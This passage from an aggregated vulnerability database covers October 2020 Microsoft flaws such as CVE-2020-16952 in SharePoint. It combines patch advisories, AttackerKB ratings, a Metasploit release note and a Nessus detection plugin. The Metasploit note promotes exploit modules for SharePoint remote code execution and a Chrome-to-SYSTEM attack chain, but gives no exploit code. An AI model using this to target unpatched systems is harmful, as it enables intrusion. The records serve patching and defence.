email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows TCP/IP RCE\n\nAn extremely critical Remote Code Execution vulnerability ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) is fixed today. Microsoft ranks this vulnerability as \u201cExploitation More Likely,\u201d and according to Microsoft and the [researchers at McAfee](<https://github.com/advanced-threat-research/CVE-2020-16898>), the vulnerability is wormable. It is highly recommended to prioritize these patches on all Windows 10, including Microsoft DNS Servers.\n\nThis vulnerability allows attackers to take complete control over Windows systems by sending malicious ICMPv6 Router Advertisement packets to vulnerable systems.\n\n### SharePoint RCE\n\nTwo remote code execution vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) are patched in Sharepoint Server that would allow an authenticated user on a guest system to perform security actions for an application pool process. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all SharePoint servers.\n\n### Graphics RCE\n\nA remote code execution vulnerability [CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>) is patched in the Graphics component that could be exploited once a user opens a specially crafted file. Based on the information given, this should be prioritized across all Windows servers and workstations.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb20-58.html>). The patches for Flash Player are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>).", "cvss3": {}, "published": "2020-10-13T18:52:03", "type": "qualysblog", "title": "October 2020 Patch Tuesday \u2013 87 Vulnerabilities, 11 Critical, SharePoint, TCP/IP Stack, Graphics, Adobe Vulns", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-16898", "CVE-2020-16923", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-13T18:52:03", "id": "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-10-27T11:11:05", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\n**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-22T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-21T08:41:22", "description": "\n\nMicrosoft brings us an October's Update Tuesday with 87 vulnerabilities, a sub-100 number we haven't experienced in quite some time. To further add to this oddity, there are no Browser-based vulnerabilities to mention and the arrival of a new Adobe Flash vulnerability [CVE-2020-9746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200012>). Despite this month's lower numbers, there are some precautions we should all take to remediate our environments quickly and effectively.\n\n## Starting with Microsoft Windows\n\nAs usual, whenever possible, it's better to prioritize updates against the Windows operating system. Coming in at 53 of the 87 vulnerabilities, patching the OS knocks out 60% of the vulnerabilities listed along with over half of the critical remote code execution vulnerabilities resolved today.\n\n### [Microsoft CVE-2020-16898: Microsoft TCP/IP Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)\n\nWith a CVSS score of 9.8 and marked as \"Exploitation More Likely\", this vulnerability grants the ability to execute code on target Windows 10 (version 1709+), Windows Server 2019, and Windows Server version 1903+ systems due to improper handling of ICMPv6 Router Advertisement packets.\n\nLuckily, if immediate patching isn't viable due to reboot scheduling, [Microsoft provides PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems. The PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\n\n### [Microsoft CVE-2020-16896: Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16896>)\n\nRDP has been a [focal point for some of recent attacks](<https://blog.rapid7.com/2020/10/09/psa-increase-in-rdp-attacks-means-its-time-to-mind-your-rdps-and-qs/>) (e.g. BlueKeep), so whenever Microsoft provides another fix within that realm, it's prudent to make note of some specifics. CVE-2020-16896 is an information disclosure vulnerability where, when successfully exploited, allows unauthorized read access to the Windows RDP server process.\n\nThis RDP vulnerability, like previous ones of late, affects all supported Windows operating systems, and can continue to be mitigated by practices such as enabling Network Level Authentication (NLA) or by blocking TCP port 3389 at the enterprise perimeter firewall.\n\n### [Microsoft CVE-2020-16911: GDI+ Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>)\n\nCritical remote code execution vulnerability CVE-2020-16911 leverages how the Windows Graphics Device Interface (GDI) handles objects in memory. A successful exploitation allows the attacker to install programs and/or create new accounts under the same user rights as the user who triggered this vulnerability.\n\nA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content.\n\nUnlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\n\n### \n\n## Moving on to Microsoft SharePoint\n\nContinuing last month's trend, there are more SharePoint-related vulnerabilities being addressed this month (10 of them) than past months. If relevant in your environment, the respective KBs for your version of SharePoint should be the next batch of patches to prioritize. Below are some highlights of the higher CVSS-scored ones.\n\n### Microsoft SharePoint Remote Code Execution Vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>))\n\nWith Proof-of-Concept exploits starting to flow out in the wild, bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\n\nCVE-2020-16951 and CVE-2020-16952 are remote code execution vulnerabilities that exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\nFor more in-depth attacker perspective, visit [AttackerKB's take on CVE-2020-16952.](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>)\n\n### Microsoft SharePoint Reflective XSS Vulnerabilities ([CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>), [CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>), [CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>))\n\nThe last set of notable SharePoint vulnerabilities this month are three CVSS 8.7 spoofing vulnerabilities. Requiring a user to click a specially-crafted URL within targeted SharePoint Web App site, a successful exploitation from those means allows the attacker to perform cross-site scripting attacks and/or run scripts in the security context of the user.\n\n## Closing October's Update Tuesday journey with Microsoft Office\n\nWhile we always expect Office-based vulnerabilities every month, two vulnerabilities particularly stood out. In both cases, the Preview Pane is considered an attack vector, which lowers the barriers to entry a bit.\n\n### [Microsoft CVE-2020-16947: Outlook Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)\n\nA critical remote code execution vulnerability for Outlook 2016, Office 2019 and Microsoft 365 apps only, CVE-2020-16947 has the potential to allow an attacker to run arbitrary code in the context of the user. The attacker could then install programs or create new accounts with full user rights.\n\nWhile the details behind this vulnerability feels standard from Microsoft's description, it actively acknowledges that the Preview Pane is an attack vector, and that in itself, attracts some attention.\n\n### [Microsoft CVE-2020-16949: Outlook Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16949>)\n\nCVE-2020-16949 is an Outlook vulnerability that affects more versions than the list around CVE-2020-14947 including Outlook 2010 and Outlook 2013. This vulnerability, however, reads differently in that this denial of service vulnerability only requires that a specially-crafted email be sent. When paired with the fact that this vulnerability is marked with the Preview Pane as an attack vector, just like CVE-2020-16947, suggests giving Outlook its fair share of attention this month.\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2020-10-13T23:25:39", "type": "rapid7blog", "title": "Patch Tuesday - October 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14947", "CVE-2020-16896", "CVE-2020-16898", "CVE-2020-16911", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16947", "CVE-2020-16949", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-9746"], "modified": "2020-10-13T23:25:39", "id": "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "href": "https://blog.rapid7.com/2020/10/13/patch-tuesday-october-2020/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:23:47", "description": "The Microsoft SharePoint Server 2016 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16948, CVE-2020-16953)\n\n - A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint. The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the victim, such as change permissions, delete content, steal sensitive information (such as browser cookies) and inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must click a specially crafted URL that takes the user to a targeted SharePoint Web App site. In an email attack scenario, an attacker could exploit the vulnerability by sending an email message containing the specially crafted URL to the user of the targeted SharePoint Web App site and convincing the user to click the specially crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2020-16945, CVE-2020-16946)\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages. An attacker who took advantage of this information disclosure could view the folder path of scripts loaded on the page. To take advantage of the vulnerability, an attacker would require access to the specific SharePoint page affected by this vulnerability. The security update addresses the vulnerability by correcting how scripts are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)", "cvss3": {}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server 2016 (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/141436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486677\");\n script_xref(name:\"MSFT\", value:\"MS20-4486677\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0126\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2016 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2016 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2016 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486677\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486677 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486677'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2016':\n { '0':\n {'Server':\n [{ \n 'kb' : '4486677',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\16\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '16.0.5071.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486677') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:51", "description": "The Microsoft SharePoint Server 2013 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16948, CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when 